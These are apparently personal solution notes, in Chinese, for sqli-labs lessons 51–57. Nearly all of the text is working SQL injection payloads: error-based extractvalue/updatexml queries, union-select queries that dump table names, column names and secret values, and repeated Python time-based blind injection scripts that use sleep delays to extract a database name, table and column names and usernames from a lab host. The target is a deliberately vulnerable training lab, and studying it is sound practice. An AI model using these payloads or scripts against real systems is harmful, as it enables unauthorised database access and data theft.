51.
'and extractvalue(1,concat(0x5c,database())) --+
'and updatexml(1,concat(0x7e,database(),0x7e),1) --+
'and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+
'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
'and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) --+
'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
'and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))) --+
'and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1) --+
52.
时间盲注
def database():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1 and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-52?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-52?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tbales = tablename()
print("最终表名称为:",tbales)
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1 and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-52?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
最终脚本
def database():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1 and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-52?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-52?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tbales = tablename()
print("最终表名称为:",tbales)
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1 and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-52?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
def data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f'1 and if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0) --+'
url = f"http://192.168.1.200:86/Less-52?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
datas = data()
print("最终数据为:",datas)
53.
对比52多了‘直接给脚本
def database():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-53?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-53?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tbales = tablename()
print("最终表名称为:",tbales)
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-53?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
def data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-53?sort={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
datas = data()
print("最终数据为:",datas)
54.
通过1’
1”
1‘ and 1=1 --+
1' and 1=0 --+
知道是字符型‘闭合
-1'union select 1,2,3 --+
-1'union select 1,database(),3 --+
-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+
-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='yu7uk3jq14'),3 --+
-1'union select 1,(select group_concat(secret_AHKQ) from challenges.yu7uk3jq14 ),3 --+
55.
通过尝试1 1‘ 1” 1) 然后and 1=1 1=0 得到是)
-1)union select 1,2,3 --+
-1)union select 1,database(),3 --+
-1)union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+
-1)union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='qagexyonus'),3 --+
-1)union select 1,(select secret_Q75I from challenges.qagexyonus),3 --+
56.
尝试 1 1’ 1“ 1) 1‘) 然后1=1 1=0 得到是’)
-1') union select 1,database(),3 --+
-1')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+
-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='l914uezg1n'),3 --+
-1')union select 1,(select secret_GKSK from challenges.l914uezg1n),3 --+
57.
通过尝试1 1‘ 1” 然后1=1 1=0 得到是“
-1"union select 1,database(),3 --+
-1"union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+
-1"union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='p5uh9b96gw'),3 --+
-1"union select 1,(select secret_4Y6J from challenges.p5uh9b96gw),3 --+